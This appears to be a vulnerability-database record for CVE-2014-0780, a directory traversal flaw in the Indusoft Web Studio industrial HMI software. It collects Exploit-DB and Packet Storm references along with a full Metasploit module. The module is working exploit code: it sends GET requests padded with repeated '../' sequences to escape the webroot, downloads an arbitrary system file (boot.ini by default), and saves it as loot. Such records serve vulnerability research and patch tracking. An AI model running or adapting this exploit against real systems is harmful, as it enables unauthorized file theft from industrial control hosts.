ID
VAR-E-201709-0120
CVE
cve_id: | CVE-2014-0780 | Trust: 1.5 |
EDB ID
42699
TITLE
Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit) - Windows webapps Exploit
Trust: 0.6
DESCRIPTION
Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit). CVE-2014-0780. Webapps exploit for the Windows platform.
Trust: 0.6
AFFECTED PRODUCTS
vendor: | indusoft | model: | web studio | scope: | - | version: | - | Trust: 2.7 |
EXPLOIT
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Indusoft Web Studio Directory Traversal',
      'Description' => %q{
        This module exploits a flaw found in Indusoft Web Studio
        <= 7.1 before SP2 Patch 4. This specific flaw allows users
        to browse outside of the webroot to download files found
        on the underlying system
      },
      'Author' => [ 'James Fitts' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision: $',
      'References' =>
        [
          [ 'CVE', '2014-0780' ],
          [ 'ZDI', '14-118/' ],
          [ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-107-02']
        ],
      'DisclosureDate' => 'Jan 18 2013'))

    register_options(
      [
        OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
        OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
        Opt::RPORT(80)
      ], self.class )
  end

  def run
    depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
    levels = "/" + ("../" * depth)

    res = send_request_raw({
      'method' => 'GET',
      'uri' => "/" + levels + datastore['FILE'],
    })

    if res and res.code == 200 and res.message =~ /Sending file/
      loot = res.body
      if not loot or loot.empty?
        print_status("File from #{rhost}:#{rport} is empty...")
        return
      end
      file = ::File.basename(datastore['FILE'])
      path = store_loot('indusoft.webstudio.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
      print_status("Stored #{datastore['FILE']} to #{path}")
      return
    end
  end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Directory Traversal Information Disclosure (Metasploit)
Trust: 1.6
TAGS
tag: | Metasploit Framework (MSF) | Trust: 1.0 |
tag: | exploit | Trust: 0.5 |
tag: | web | Trust: 0.5 |
tag: | file inclusion | Trust: 0.5 |
CREDITS
James Fitts
Trust: 0.6
EXTERNAL IDS
db: | ICS CERT | id: | ICSA-14-107-02 | Trust: 2.7 |
db: | EXPLOIT-DB | id: | 42699 | Trust: 1.6 |
db: | NVD | id: | CVE-2014-0780 | Trust: 1.5 |
db: | EDBNET | id: | 94189 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 28533 | Trust: 0.6 |
db: | EDBNET | id: | 94466 | Trust: 0.6 |
db: | PACKETSTORM | id: | 144175 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2014-0780 | Trust: 1.5 |
url: | https://www.exploit-db.com/exploits/42699/ | Trust: 0.6 |
url: | https://0day.today/exploits/28533 | Trust: 0.6 |
SOURCES
db: | PACKETSTORM | id: | 144175 |
db: | EXPLOIT-DB | id: | 42699 |
db: | EDBNET | id: | 94189 |
db: | EDBNET | id: | 94466 |
LAST UPDATE DATE
2022-07-27T09:24:18.078000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 144175 | date: | 2017-09-15T01:15:20 |
db: | EXPLOIT-DB | id: | 42699 | date: | 2017-09-13T00:00:00 |
db: | EDBNET | id: | 94189 | date: | 2017-09-13T00:00:00 |
db: | EDBNET | id: | 94466 | date: | 2017-10-13T00:00:00 |